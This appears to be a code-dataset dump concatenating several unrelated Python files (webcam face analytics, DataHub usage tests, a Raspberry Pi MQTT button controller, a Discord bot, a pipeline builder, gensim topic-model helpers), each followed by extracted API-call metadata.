pt = ad.displayAge(frame, idx, h, 0.50, 0.35)
ch = ad.displayHair(frame, idx, h)
ad.displayAvatar(frame, h, pt, ch)
ad.displayEmotion(frame, h, pt)
ad.displayGender(frame, h, pt)
ad.displayGaze(frame, idx, h, pt, 0.50)
panel = ((width - 180, 40), (width-20, height - 40))
ad.blur(frame, panel[0], panel[1], (255, 255, 255), 2)
ad.computeConversion(res, events, entities, engaged, stats, animation, 0.5, 500)
ad.displayConversion(frame, stats, (width - 100, int(0.3*height)))
ad.displayAnimation(frame, animation)
ad.display_logo(frame, 20, height - 60)
cv2.imshow('window', frame)
if cv2.waitKey(1) & 0xFF == ord('q'):
stats.save()
break
service.disable_session()
camera.release()
cv2.destroyAllWindows()
if __name__ == '__main__':
### Web cam index might be different from 0 on your setup.
### To grab a given video file instead of the host computer cam, try:
### main("/path/to/myvideo.avi")
f(0, 640, 480)
|
[
"angus_display.blur",
"angus_display.displayHair",
"cv2.imencode",
"cv2.imshow",
"angus_display.displayAnimation",
"angus_display.displayAge",
"angus_display.displayGaze",
"cv2.cvtColor",
"angus_display.displayAvatar",
"angus_display.display_logo",
"cv2.destroyAllWindows",
"datetime.datetime.now",
"angus_display.displayEmotion",
"cv2.waitKey",
"angus_display.displayGender",
"cv2.VideoCapture",
"stats.Stats",
"numpy.array",
"angus.connect",
"angus_display.computeConversion"
] |
[((995, 1025), 'cv2.VideoCapture', 'cv2.VideoCapture', (['stream_index'], {}), '(stream_index)\n', (1011, 1025), False, 'import cv2\n'), ((1407, 1429), 'stats.Stats', 'st.Stats', (['"""stats.json"""'], {}), "('stats.json')\n", (1415, 1429), True, 'import stats as st\n'), ((1478, 1493), 'angus.connect', 'angus.connect', ([], {}), '()\n', (1491, 1493), False, 'import angus\n'), ((3597, 3620), 'cv2.destroyAllWindows', 'cv2.destroyAllWindows', ([], {}), '()\n', (3618, 3620), False, 'import cv2\n'), ((1712, 1751), 'cv2.cvtColor', 'cv2.cvtColor', (['frame', 'cv2.COLOR_BGR2GRAY'], {}), '(frame, cv2.COLOR_BGR2GRAY)\n', (1724, 1751), False, 'import cv2\n'), ((1772, 1830), 'cv2.imencode', 'cv2.imencode', (['""".jpg"""', 'gray', '[cv2.IMWRITE_JPEG_QUALITY, 80]'], {}), "('.jpg', gray, [cv2.IMWRITE_JPEG_QUALITY, 80])\n", (1784, 1830), False, 'import cv2\n'), ((1905, 1936), 'datetime.datetime.now', 'datetime.datetime.now', (['pytz.utc'], {}), '(pytz.utc)\n', (1926, 1936), False, 'import datetime\n'), ((3100, 3154), 'angus_display.blur', 'ad.blur', (['frame', 'panel[0]', 'panel[1]', '(255, 255, 255)', '(2)'], {}), '(frame, panel[0], panel[1], (255, 255, 255), 2)\n', (3107, 3154), True, 'import angus_display as ad\n'), ((3163, 3248), 'angus_display.computeConversion', 'ad.computeConversion', (['res', 'events', 'entities', 'engaged', 'stats', 'animation', '(0.5)', '(500)'], {}), '(res, events, entities, engaged, stats, animation, 0.5, 500\n )\n', (3183, 3248), True, 'import angus_display as ad\n'), ((3327, 3364), 'angus_display.displayAnimation', 'ad.displayAnimation', (['frame', 'animation'], {}), '(frame, animation)\n', (3346, 3364), True, 'import angus_display as ad\n'), ((3373, 3412), 'angus_display.display_logo', 'ad.display_logo', (['frame', '(20)', '(height - 60)'], {}), '(frame, 20, height - 60)\n', (3388, 3412), True, 'import angus_display as ad\n'), ((3422, 3449), 'cv2.imshow', 'cv2.imshow', (['"""window"""', 'frame'], {}), "('window', frame)\n", (3432, 3449), False, 'import cv2\n'), ((2756, 2795), 'angus_display.displayAge', 'ad.displayAge', (['frame', 'idx', 'h', '(0.5)', '(0.35)'], {}), '(frame, idx, h, 0.5, 0.35)\n', (2769, 2795), True, 'import angus_display as ad\n'), ((2814, 2843), 'angus_display.displayHair', 'ad.displayHair', (['frame', 'idx', 'h'], {}), '(frame, idx, h)\n', (2828, 2843), True, 'import angus_display as ad\n'), ((2856, 2890), 'angus_display.displayAvatar', 'ad.displayAvatar', (['frame', 'h', 'pt', 'ch'], {}), '(frame, h, pt, ch)\n', (2872, 2890), True, 'import angus_display as ad\n'), ((2903, 2934), 'angus_display.displayEmotion', 'ad.displayEmotion', (['frame', 'h', 'pt'], {}), '(frame, h, pt)\n', (2920, 2934), True, 'import angus_display as ad\n'), ((2947, 2977), 'angus_display.displayGender', 'ad.displayGender', (['frame', 'h', 'pt'], {}), '(frame, h, pt)\n', (2963, 2977), True, 'import angus_display as ad\n'), ((2990, 3028), 'angus_display.displayGaze', 'ad.displayGaze', (['frame', 'idx', 'h', 'pt', '(0.5)'], {}), '(frame, idx, h, pt, 0.5)\n', (3004, 3028), True, 'import angus_display as ad\n'), ((3462, 3476), 'cv2.waitKey', 'cv2.waitKey', (['(1)'], {}), '(1)\n', (3473, 3476), False, 'import cv2\n'), ((1865, 1879), 'numpy.array', 'np.array', (['buff'], {}), '(buff)\n', (1873, 1879), True, 'import numpy as np\n')]
|
from datetime import datetime
import pytest
from pydantic import ValidationError
from datahub.configuration.time_window_config import BucketDuration, get_time_bucket
from datahub.emitter.mcp import MetadataChangeProposalWrapper
from datahub.ingestion.api.workunit import MetadataWorkUnit
from datahub.ingestion.source.usage.usage_common import (
BaseUsageConfig,
GenericAggregatedDataset,
)
from datahub.metadata.schema_classes import DatasetUsageStatisticsClass
_TestTableRef = str
_TestAggregatedDataset = GenericAggregatedDataset[_TestTableRef]
def test_add_one_query_without_columns():
test_email = "<EMAIL>"
test_query = "select * from test"
event_time = datetime(2020, 1, 1)
floored_ts = get_time_bucket(event_time, BucketDuration.DAY)
resource = "test_db.test_schema.test_table"
ta = _TestAggregatedDataset(bucket_start_time=floored_ts, resource=resource)
ta.add_read_entry(
test_email,
test_query,
[],
)
assert ta.queryCount == 1
assert ta.queryFreq[test_query] == 1
assert ta.userFreq[test_email] == 1
assert len(ta.columnFreq) == 0
def test_multiple_query_without_columns():
test_email = "<EMAIL>"
test_email2 = "<EMAIL>"
test_query = "select * from test"
test_query2 = "select * from test2"
event_time = datetime(2020, 1, 1)
floored_ts = get_time_bucket(event_time, BucketDuration.DAY)
resource = "test_db.test_schema.test_table"
ta = _TestAggregatedDataset(bucket_start_time=floored_ts, resource=resource)
ta.add_read_entry(
test_email,
test_query,
[],
)
ta.add_read_entry(
test_email,
test_query,
[],
)
ta.add_read_entry(
test_email2,
test_query2,
[],
)
assert ta.queryCount == 3
assert ta.queryFreq[test_query] == 2
assert ta.userFreq[test_email] == 2
assert ta.queryFreq[test_query2] == 1
assert ta.userFreq[test_email2] == 1
assert len(ta.columnFreq) == 0
def test_make_usage_workunit():
test_email = "<EMAIL>"
test_query = "select * from test"
event_time = datetime(2020, 1, 1)
floored_ts = get_time_bucket(event_time, BucketDuration.DAY)
resource = "test_db.test_schema.test_table"
ta = _TestAggregatedDataset(bucket_start_time=floored_ts, resource=resource)
ta.add_read_entry(
test_email,
test_query,
[],
)
wu: MetadataWorkUnit = ta.make_usage_workunit(
bucket_duration=BucketDuration.DAY, urn_builder=lambda x: x, top_n_queries=10
)
assert wu.id == "2020-01-01T00:00:00-test_db.test_schema.test_table"
assert isinstance(wu.get_metadata()["metadata"], MetadataChangeProposalWrapper)
du: DatasetUsageStatisticsClass = wu.get_metadata()["metadata"].aspect
assert du.totalSqlQueries == 1
assert du.topSqlQueries
assert du.topSqlQueries.pop() == test_query
def test_query_trimming():
test_email: str = "<EMAIL>"
test_query: str = "select * from test where a > 10 and b > 20 order by a asc"
top_n_queries: int = 10
total_budget_for_query_list: int = 200
event_time = datetime(2020, 1, 1)
floored_ts = get_time_bucket(event_time, BucketDuration.DAY)
resource = "test_db.test_schema.test_table"
ta = _TestAggregatedDataset(bucket_start_time=floored_ts, resource=resource)
ta.total_budget_for_query_list = total_budget_for_query_list
ta.add_read_entry(
test_email,
test_query,
[],
)
wu: MetadataWorkUnit = ta.make_usage_workunit(
bucket_duration=BucketDuration.DAY,
urn_builder=lambda x: x,
top_n_queries=top_n_queries,
)
assert wu.id == "2020-01-01T00:00:00-test_db.test_schema.test_table"
assert isinstance(wu.get_metadata()["metadata"], MetadataChangeProposalWrapper)
du: DatasetUsageStatisticsClass = wu.get_metadata()["metadata"].aspect
assert du.totalSqlQueries == 1
assert du.topSqlQueries
assert du.topSqlQueries.pop() == "select * f ..."
def test_top_n_queries_validator_fails():
with pytest.raises(ValidationError) as excinfo:
GenericAggregatedDataset.total_budget_for_query_list = 20
BaseUsageConfig(top_n_queries=2)
assert "top_n_queries is set to 2 but it can be maximum 1" in str(excinfo.value)
|
[
"datahub.ingestion.source.usage.usage_common.BaseUsageConfig",
"pytest.raises",
"datahub.configuration.time_window_config.get_time_bucket",
"datetime.datetime"
] |
[((687, 707), 'datetime.datetime', 'datetime', (['(2020)', '(1)', '(1)'], {}), '(2020, 1, 1)\n', (695, 707), False, 'from datetime import datetime\n'), ((726, 773), 'datahub.configuration.time_window_config.get_time_bucket', 'get_time_bucket', (['event_time', 'BucketDuration.DAY'], {}), '(event_time, BucketDuration.DAY)\n', (741, 773), False, 'from datahub.configuration.time_window_config import BucketDuration, get_time_bucket\n'), ((1329, 1349), 'datetime.datetime', 'datetime', (['(2020)', '(1)', '(1)'], {}), '(2020, 1, 1)\n', (1337, 1349), False, 'from datetime import datetime\n'), ((1368, 1415), 'datahub.configuration.time_window_config.get_time_bucket', 'get_time_bucket', (['event_time', 'BucketDuration.DAY'], {}), '(event_time, BucketDuration.DAY)\n', (1383, 1415), False, 'from datahub.configuration.time_window_config import BucketDuration, get_time_bucket\n'), ((2140, 2160), 'datetime.datetime', 'datetime', (['(2020)', '(1)', '(1)'], {}), '(2020, 1, 1)\n', (2148, 2160), False, 'from datetime import datetime\n'), ((2179, 2226), 'datahub.configuration.time_window_config.get_time_bucket', 'get_time_bucket', (['event_time', 'BucketDuration.DAY'], {}), '(event_time, BucketDuration.DAY)\n', (2194, 2226), False, 'from datahub.configuration.time_window_config import BucketDuration, get_time_bucket\n'), ((3157, 3177), 'datetime.datetime', 'datetime', (['(2020)', '(1)', '(1)'], {}), '(2020, 1, 1)\n', (3165, 3177), False, 'from datetime import datetime\n'), ((3196, 3243), 'datahub.configuration.time_window_config.get_time_bucket', 'get_time_bucket', (['event_time', 'BucketDuration.DAY'], {}), '(event_time, BucketDuration.DAY)\n', (3211, 3243), False, 'from datahub.configuration.time_window_config import BucketDuration, get_time_bucket\n'), ((4095, 4125), 'pytest.raises', 'pytest.raises', (['ValidationError'], {}), '(ValidationError)\n', (4108, 4125), False, 'import pytest\n'), ((4212, 4244), 'datahub.ingestion.source.usage.usage_common.BaseUsageConfig', 'BaseUsageConfig', ([], {'top_n_queries': '(2)'}), '(top_n_queries=2)\n', (4227, 4244), False, 'from datahub.ingestion.source.usage.usage_common import BaseUsageConfig, GenericAggregatedDataset\n')]
|
#!/usr/bin/python
import paho.mqtt.publish as publish
import RPi.GPIO as GPIO
import subprocess
import time
import os
#Define list of button parameters
PIN_CONFIG = [
{'pin':20, 'mqttTopic':'home/htpc/power/restart'},
{'pin':21, 'mqttTopic':'home/htpc/power/off'},
{'pin':13, 'mqttTopic':'home/htpc/kodi/on'},
{'pin':19, 'mqttTopic':'home/htpc/plex/on'},
{'pin':26, 'mqttTopic':'home/htpc/steam/on'}
]
#Define other inputs
HOST = '10.0.1.xxx'
MQTT_BROKER = '10.0.1.xxx'
IR_CMD = 'irsend SEND_ONCE samsung KEY_POWER2'
WOL_CMD = 'sudo etherwake xx:xx:xx:xx:xx:xx'
#Define functions
def MqttMessage(mqtt_topic, mqtt_broker):
publish.single(mqtt_topic, '', hostname=mqtt_broker)
print('MQTT message \"' + mqtt_topic + '\" sent via broker \"' + mqtt_broker + '\"')
def CmdBash(command, message):
subprocess.call(['bash', '-c', command])
if message != '': print(message)
def CheckStatus(host):
print('Checking status of: ' + host)
response = os.system("ping -c 1 " + host)
if response:
print('Fail, host \"' + host + '\" is unreachable')
return False
else:
print('Success')
return True
def Startup(host, mqtt_topic):
#Ping HTPC to check if already powered on, else initiate startup sequence
if CheckStatus(host): return True
print('Initiating startup sequence instead')
#Turn on TV then boot PC using WOL
CmdBash(IR_CMD, 'IR power signal sent to TV')
CmdBash(WOL_CMD, 'Magic packet sent to wake HTPC')
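# Illustrative flow (not part of the original file): pressing the pin-19
# button publishes 'home/htpc/plex/on' only when Startup() confirms the HTPC
# answers ping; otherwise Startup() powers the TV via IR and wakes the PC
# via WOL first, and no MQTT message is sent for that press.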
def Callback(channel):
#Find mqttTopic corresponding to PIN
for item in PIN_CONFIG:
if item['pin'] == channel:
mqtt_topic = item['mqttTopic']
#Print details of instruction being processed
print('Button ' + str(channel) + ' was pressed which corresponds to the command: ' + mqtt_topic)
#Process topic
    if mqtt_topic in ('home/htpc/power/restart', 'home/htpc/power/off'):
if CheckStatus(HOST): #check whether htpc already on
MqttMessage(mqtt_topic, MQTT_BROKER) #trigger shutdown directly
if mqtt_topic == 'home/htpc/power/off':
time.sleep(5) #wait 5s, then turn off TV
CmdBash(IR_CMD, 'IR power signal sent to TV')
else:
        if Startup(HOST, mqtt_topic): #send MQTT message if PC on, else initiate startup sequence
MqttMessage(mqtt_topic, MQTT_BROKER)
def GPIOsetup(pin):
GPIO.setup(pin, GPIO.IN, pull_up_down=GPIO.PUD_UP)
GPIO.add_event_detect(pin, GPIO.FALLING, callback=Callback, bouncetime=10000)
#@@@ MAIN PROGRAM @@@
#Setup buttons according to parameters defined in list
GPIO.setmode(GPIO.BCM)
for item in PIN_CONFIG:
pin = item['pin']
GPIOsetup(pin)
#Infinite loop to prevent program from ending
while True:
    time.sleep(1) #idle instead of busy-spinning a CPU core
|
[
"RPi.GPIO.setmode",
"RPi.GPIO.setup",
"os.system",
"time.sleep",
"subprocess.call",
"paho.mqtt.publish.single",
"RPi.GPIO.add_event_detect"
] |
[((2530, 2552), 'RPi.GPIO.setmode', 'GPIO.setmode', (['GPIO.BCM'], {}), '(GPIO.BCM)\n', (2542, 2552), True, 'import RPi.GPIO as GPIO\n'), ((628, 680), 'paho.mqtt.publish.single', 'publish.single', (['mqtt_topic', '""""""'], {'hostname': 'mqtt_broker'}), "(mqtt_topic, '', hostname=mqtt_broker)\n", (642, 680), True, 'import paho.mqtt.publish as publish\n'), ((802, 842), 'subprocess.call', 'subprocess.call', (["['bash', '-c', command]"], {}), "(['bash', '-c', command])\n", (817, 842), False, 'import subprocess\n'), ((954, 984), 'os.system', 'os.system', (["('ping -c 1 ' + host)"], {}), "('ping -c 1 ' + host)\n", (963, 984), False, 'import os\n'), ((2321, 2371), 'RPi.GPIO.setup', 'GPIO.setup', (['pin', 'GPIO.IN'], {'pull_up_down': 'GPIO.PUD_UP'}), '(pin, GPIO.IN, pull_up_down=GPIO.PUD_UP)\n', (2331, 2371), True, 'import RPi.GPIO as GPIO\n'), ((2374, 2451), 'RPi.GPIO.add_event_detect', 'GPIO.add_event_detect', (['pin', 'GPIO.FALLING'], {'callback': 'Callback', 'bouncetime': '(10000)'}), '(pin, GPIO.FALLING, callback=Callback, bouncetime=10000)\n', (2395, 2451), True, 'import RPi.GPIO as GPIO\n'), ((2034, 2047), 'time.sleep', 'time.sleep', (['(5)'], {}), '(5)\n', (2044, 2047), False, 'import time\n')]
|
import unittest
from histogram_class import Histogram
class Test_Histogram(unittest.TestCase):
def test_add_to_histogram(self):
h = Histogram()
h.add("Apache")
h.add("Apache")
h.add("IIS")
self.assertTrue(h.count("Apache") == 2)
self.assertTrue(h.count("IIS") == 1)
def test_get_dict(self):
h = Histogram()
h.add("Apache")
h.add("Apache")
h.add("IIS")
wanted_result = {"Apache": 2, "IIS": 1}
self.assertEqual(h.get_dict(), wanted_result)
if __name__ == '__main__':
unittest.main()
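# --- Illustrative implementation (not part of the original file) ---
# A minimal Histogram that would satisfy the tests above; the real
# histogram_class module may differ:
#
#   from collections import Counter
#   class Histogram:
#       def __init__(self):
#           self._counts = Counter()
#       def add(self, key):
#           self._counts[key] += 1
#       def count(self, key):
#           return self._counts[key]
#       def get_dict(self):
#           return dict(self._counts)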
|
[
"unittest.main",
"histogram_class.Histogram"
] |
[((580, 595), 'unittest.main', 'unittest.main', ([], {}), '()\n', (593, 595), False, 'import unittest\n'), ((147, 158), 'histogram_class.Histogram', 'Histogram', ([], {}), '()\n', (156, 158), False, 'from histogram_class import Histogram\n'), ((364, 375), 'histogram_class.Histogram', 'Histogram', ([], {}), '()\n', (373, 375), False, 'from histogram_class import Histogram\n')]
|
import os
import logging
from typing import Dict, List, Any, Union, Callable, NewType
from ..common.absclient import AbstractPipelineComponent
from ..grammar_tester.grammartester import GrammarTesterComponent
from ..grammar_learner import GrammarLearnerComponent
from ..text_parser import TextParserComponent
from ..dash_board.textdashboard import TextFileDashboardComponent
from .varhelper import get_path_from_dict, subst_variables_in_str, subst_variables_in_dict, subst_variables_in_dict2
from .pipelinetreenode import PipelineTreeNode2
__all__ = ['build_tree', 'run_tree']
logger = logging.getLogger(__name__)
class PathCreatorComponent(AbstractPipelineComponent):
def __init__(self):
pass
def validate_parameters(self, **kwargs):
return True
def run(self, **kwargs):
return {}
@staticmethod
def create(**kwargs):
path = kwargs.get("path", None)
if path is not None and not os.path.isdir(path):
os.makedirs(path)
return {"path": path}
PIPELINE_COMPONENTS = {
"path-creator": PathCreatorComponent,
"grammar-tester": GrammarTesterComponent,
"grammar-learner": GrammarLearnerComponent,
"text-parser": TextParserComponent,
"dash-board": TextFileDashboardComponent
}
def get_component(name: str, params: dict) -> AbstractPipelineComponent:
"""
Create an instance of the pipeline component
:param name: Pipeline component name.
:return: AbstractPipelineComponent instance pointer.
"""
try:
# Create an instance of specified pipeline component
component = PIPELINE_COMPONENTS[name](**params)
# Check the instance to be proper pipeline component
if not isinstance(component, AbstractPipelineComponent):
raise Exception("Error: " + str(type(component)) + " is not an instance of AbstractPipelineComponent")
return component
except KeyError:
raise Exception("Error: '{}' is not a valid pipeline component name.".format(name))
except Exception as err:
logger.error(str(type(err)) + ": " + str(err))
raise err
def single_proc_exec(node: PipelineTreeNode2) -> None:
if node is None:
return
leaf = node._environment["LEAF"]
create = node._environment.get("CREATE_LEAF", False)
# Create path if it does not exist
if create and not os.path.isdir(leaf):
os.makedirs(leaf)
parameters = node._parameters
result = {}
pre_exec = parameters.get("pre-exec-req", None)
if pre_exec:
for req in pre_exec:
result = handle_request(node, req)
# Create component instance
component = get_component(node._component_name, parameters)
# Execute component
result = component.run(**{**parameters, **result})
post_exec = parameters.get("post-exec-req", None)
if post_exec:
for req in post_exec:
handle_request(node, {**req, **result})
# Just for debug purposes
    logger.info(node._component_name + ": successful execution")
def handle_request(node: PipelineTreeNode2, req: dict) -> None:
"""
Handle Post-execute Request
    :param node: Pipeline tree node reference.
:param req: Request parameter dictionary.
:return: None
"""
obj = req.pop("obj", None)
if obj is None:
raise Exception("Error: Required parameter 'obj' does not exist.")
pos = str(obj).find(".")
if pos < 0:
raise Exception("Error: Object name and method should be separated by comma.")
name = obj[:pos]
meth = obj[pos+1:]
inst = node.static_components.get(name, None)
if inst is None:
raise Exception("Error: static component '{}' does not exist.".format(name))
return getattr(inst, meth)(**req)
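# Illustrative request (not part of the original file): "obj" holds
# "<static-component-instance>.<method>" and the remaining keys are forwarded
# as keyword arguments; the instance and method names below are hypothetical:
#
#   handle_request(node, {"obj": "dashboard.set_cell", "row": 1, "col": 2, "value": "0.5"})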
def prepare_parameters(parent: PipelineTreeNode2, common: dict, specific: dict, environment: dict, first_char="%",
create_sub_dir: bool=True) -> (dict, dict):
"""
Create built-in variables (PREV, RPREV, LEAF, RLEAF), substitute variables, starting with '%'
with their real values.
:param parent: Parent node of the execution tree.
:param common: Common parameters dictionary.
:param specific: Specific parameters dictionary.
:param environment: Environment dictionary.
:param first_char: Character that delimits variables ('%' is default).
:param create_sub_dir Boolean value forces the program to create subdirectory path based on specific dictionary.
:return: Tuple of two dictionaries: one for parameters, another for environment.
"""
# Merge two dictionaries 'common-parameters' and 'specific-parameters'
all_parameters = {**common, **specific} if common is not None else specific
create_leaf = False
# Check if 'LEAF' path should be created
for v in all_parameters.values():
if type(v) == str and v.find("LEAF") >= 0:
create_leaf = True
# Path parameters should not appear in other paths
non_path = {k: v for k, v in zip(specific.keys(), specific.values())
if (not (isinstance(v, list) or isinstance(v, dict) or isinstance(v, str)))
or (isinstance(v, str) and v.find("/") < 0 and v.find("%") < 0)}
# Get subdir path based on specific parameters if requested
rleaf = get_path_from_dict(non_path, "_") if create_leaf else ""
# rleaf = get_path_from_dict(non_path, "_") if create_sub_dir else ""
logger.debug("RLEAF: " + rleaf)
inherit_prev = all_parameters.get("inherit_prev_path", False)
leaf = environment["PREV"] + "/" + rleaf if inherit_prev else environment["ROOT"] + "/" + rleaf
logger.debug("LEAF: " + leaf)
new_environment = {**environment, **{"RLEAF": rleaf, "LEAF": leaf, "CREATE_LEAF": create_leaf}}
scopes = {"THIS": {**new_environment, **all_parameters}, "PREV": {}} if parent is None else \
{"THIS": {**new_environment, **all_parameters}, "PREV": {**parent._environment, **parent._parameters}}
# Substitute derived path for LEAF, PREV and other variables
all_parameters = subst_variables_in_dict2(all_parameters, scopes, True, first_char)
logger.debug("all_parameters: {}".format(all_parameters))
return all_parameters, new_environment
def build_tree(config: List, globals: dict, first_char="%") -> List[PipelineTreeNode2]:
parents = list()
for level, component_config in enumerate(config):
name = component_config.get("component", None)
type = component_config.get("type", "dynamic")
comm = component_config.get("common-parameters", None)
spec = component_config.get("specific-parameters", None)
if name is None:
raise Exception("No 'component' parameter found in configuration.")
if type == "dynamic" and spec is None:
raise Exception("No 'specific-parameters' section found in configuration.")
if type == "static":
params = subst_variables_in_dict(component_config.get("parameters", {}), globals, first_char)
inst_name = component_config.get("instance-name", None)
if inst_name is not None:
PipelineTreeNode2.static_components[inst_name] = get_component(name, params)
continue
children = list()
if len(parents):
for parent in parents:
# Only if the previous component path should be followed
if parent._parameters.get("follow_exec_path", True):
for specific in spec:
# Create parameter and environment dictionaries
parameters, environment = prepare_parameters(
parent, comm, specific,
{**globals, **{"RPREV": parent._environment["RLEAF"], "PREV": parent._environment["LEAF"]}},
first_char, len(spec) > 1)
children.append(PipelineTreeNode2(level, name, parameters, environment, parent))
else:
for specific in spec:
# Create parameter and environment dictionaries
parameters, environment = prepare_parameters(None, comm, specific, globals, first_char, len(spec) > 1)
children.append(PipelineTreeNode2(level, name, parameters, environment, None))
        parents = children
return PipelineTreeNode2.roots
def run_tree() -> None:
PipelineTreeNode2.traverse_all(single_proc_exec)
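# --- Illustrative configuration (not part of the original file) ---
# A hedged sketch of the list build_tree() consumes; component names come
# from PIPELINE_COMPONENTS above, while every path and parameter value below
# is hypothetical:
#
#   config = [
#       {"component": "text-parser", "type": "dynamic",
#        "common-parameters": {"verbose": "min"},
#        "specific-parameters": [{"input_path": "%ROOT/corpus"}]},
#   ]
#   build_tree(config, {"ROOT": "/home/user/data"})
#   run_tree()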
|
[
"os.path.isdir",
"os.makedirs",
"logging.getLogger"
] |
[((591, 618), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (608, 618), False, 'import logging\n'), ((2421, 2438), 'os.makedirs', 'os.makedirs', (['leaf'], {}), '(leaf)\n', (2432, 2438), False, 'import os\n'), ((982, 999), 'os.makedirs', 'os.makedirs', (['path'], {}), '(path)\n', (993, 999), False, 'import os\n'), ((2392, 2411), 'os.path.isdir', 'os.path.isdir', (['leaf'], {}), '(leaf)\n', (2405, 2411), False, 'import os\n'), ((949, 968), 'os.path.isdir', 'os.path.isdir', (['path'], {}), '(path)\n', (962, 968), False, 'import os\n')]
|
import discord, platform, os
from discord.ext import commands
t = os.environ['DISCORD_TOKEN']
pfx = os.environ['DISCORD_PFX']
hid = int(os.environ['HID'])
async def is_owner(ctx):
    return ctx.author.id == hid
client = commands.Bot(command_prefix=pfx, case_insensitive=True)
@client.command()
async def tst(ctx):
await ctx.send(content="I'm up!")
@client.command()
@commands.check(is_owner)
async def stop(ctx):
await ctx.send(content="Goodbye!")
await client.close()
@client.event
async def on_message(message):
    op = await is_owner(message)  # a Message exposes .author.id just like a ctx
    if message.author.id == client.user.id:
        return  # ignore the bot's own messages
if message.content.lower().startswith("all.stop") and op:
await message.channel.send(content="Goodbye!")
await client.close()
if message.content.lower().startswith("all.tst"):
await message.channel.send(content="I'm up!")
if message.content.lower().startswith(f"{pfx}token") or message.content.lower().startswith("all.token"):
if op:
print(f"{message.author}<{message.author.id}> requested this bot's token and it was sent to them")
await message.author.send(content=f"Here is the token you requested!\n```\n{t}\n```")
await message.channel.send(content=":white_check_mark: Check your DMs! :white_check_mark:")
        else:
print(f"{message.author}<{message.author.id}> requested this bot's token and it was not sent to them because they did not have the required permission")
await message.channel.send(content=":x: You don't have the required permission. This incident has been logged. :x:")
await client.process_commands(message)
@client.event
async def on_ready():
    startlat = int(client.latency * 1000)  # startup latency in ms (currently unused)
    pyver = platform.python_version()
    discver = discord.__version__
print(f"We have logged in as {client.user}<@!{client.user.id}>")
    await client.change_presence(status=discord.Status.dnd, activity=discord.Game(f"Python {pyver} Discord.py {discver}"))
@client.event
async def on_command_error(ctx, error):
if isinstance(error,commands.errors.CommandNotFound):
pass
client.run(t)
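# --- Hypothetical launch sketch (not part of the original script) ---
# Everything is read from the environment; the file name "bot.py" is assumed:
#   export DISCORD_TOKEN=...    # bot token from the Discord developer portal
#   export DISCORD_PFX=!        # command prefix
#   export HID=123456789        # Discord user id of the bot owner
#   python bot.py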
|
[
"discord.Game",
"discord.ext.commands.check",
"platform.python_version",
"discord.ext.commands.Bot"
] |
[((209, 264), 'discord.ext.commands.Bot', 'commands.Bot', ([], {'command_prefix': 'pfx', 'case_insensitive': '(True)'}), '(command_prefix=pfx, case_insensitive=True)\n', (221, 264), False, 'from discord.ext import commands\n'), ((359, 383), 'discord.ext.commands.check', 'commands.check', (['is_owner'], {}), '(is_owner)\n', (373, 383), False, 'from discord.ext import commands\n'), ((1735, 1760), 'platform.python_version', 'platform.python_version', ([], {}), '()\n', (1758, 1760), False, 'import discord, platform, os\n'), ((1917, 1969), 'discord.Game', 'discord.Game', (['f"""Python {pyver} Discord.py {discver}"""'], {}), "(f'Python {pyver} Discord.py {discver}')\n", (1929, 1969), False, 'import discord, platform, os\n')]
|
from soteria.debug_support.boogie_output_parser import BoogieOutputParser
class TestBoogieOutputParser:
sample1 = '''input(168,1): Error BP5002: A precondition for this call might not hold.
input(146,1): Related location: This is the precondition that might not hold.
Execution trace:
input(164,2): anon0
input(168,1): Error BP5002: A precondition for this call might not hold.
input(145,1): Related location: This is the precondition that might not hold.
Execution trace:
input(164,2): anon0
Boogie program verifier finished with 2 verified, 2 errors'''
sample2 = '''Boogie program verifier version 2.3.0.61016, Copyright (c) 2003-2014, Microsoft.
test_models/stability_decrement_transfer.bpl(167,1): Error BP5002: A precondition for this call might not hold.
test_models/stability_decrement_transfer.bpl(145,1): Related location: This is the precondition that might not hold.
Execution trace:
test_models/stability_decrement_transfer.bpl(163,2): anon0
Boogie program verifier finished with 2 verified, 1 error'''
def test_parse(self):
parser = BoogieOutputParser()
errors = parser.parse(self.sample1)
assert len(errors) == 2
assert errors[0].line == 168
assert errors[0].code == 'BP5002'
assert errors[0].message == 'A precondition for this call might not hold.'
assert len(errors[0].related_locations) == 1
assert errors[0].related_locations[0].line == 146
assert errors[1].related_locations[0].line == 145
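    def test_parse_file_path_locations(self):
        # Hypothetical companion test (assumption, not in the original file:
        # the parser extracts the same fields when locations carry a file path
        # instead of the plain 'input' prefix).
        parser = BoogieOutputParser()
        errors = parser.parse(self.sample2)
        assert len(errors) == 1
        assert errors[0].line == 167
        assert errors[0].code == 'BP5002'
        assert errors[0].related_locations[0].line == 145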
|
[
"soteria.debug_support.boogie_output_parser.BoogieOutputParser"
] |
[((1083, 1103), 'soteria.debug_support.boogie_output_parser.BoogieOutputParser', 'BoogieOutputParser', ([], {}), '()\n', (1101, 1103), False, 'from soteria.debug_support.boogie_output_parser import BoogieOutputParser\n')]
|
# -*- coding: utf-8 -*-
import logging
import numpy as np
import gensim
from .common import MultiprocModelsRunner, MultiprocModelsWorkerABC, MultiprocEvaluationRunner, \
MultiprocEvaluationWorkerABC, dtm_to_gensim_corpus
from .eval_metrics import metric_cao_juan_2009
AVAILABLE_METRICS = (
'perplexity',
# 'cross_validation',
'cao_juan_2009',
# 'arun_2010',
)
logger = logging.getLogger('tmtoolkit')
def get_model_perplexity(model, eval_corpus):
n_words = sum(cnt for document in eval_corpus for _, cnt in document)
bound = model.bound(eval_corpus)
perwordbound = bound / n_words
return np.exp2(-perwordbound)
class MultiprocModelsWorkerGensim(MultiprocModelsWorkerABC):
package_name = 'gensim'
def fit_model(self, data, params, return_data=False):
data = dtm_to_gensim_corpus(data.tocsr())
model = gensim.models.ldamodel.LdaModel(data, **params)
if return_data:
return model, data
else:
return model
class MultiprocEvaluationWorkerGensim(MultiprocEvaluationWorkerABC, MultiprocModelsWorkerGensim):
def fit_model(self, data, params, return_data=False):
model, data = super(MultiprocEvaluationWorkerGensim, self).fit_model(data, params, return_data=True)
results = {}
if self.return_models:
results['model'] = model
for metric in self.eval_metric:
# if metric == 'cross_validation': continue
if metric == 'cao_juan_2009':
res = metric_cao_juan_2009(model.state.get_lambda())
# elif metric == 'arun_2010': # TODO: fix this (get document topic distr. from gensim model)
# results = metric_arun_2010(train_model.state.get_lambda(), train_model[corpus_train], data.sum(axis=1))
else: # default: perplexity
res = get_model_perplexity(model, data)
logger.info('> evaluation result with metric "%s": %f' % (metric, res))
results[metric] = res
return results
def compute_models_parallel(data, varying_parameters=None, constant_parameters=None, n_max_processes=None):
"""
Compute several Topic Models in parallel using the "gensim" package. Use a single or multiple document term matrices
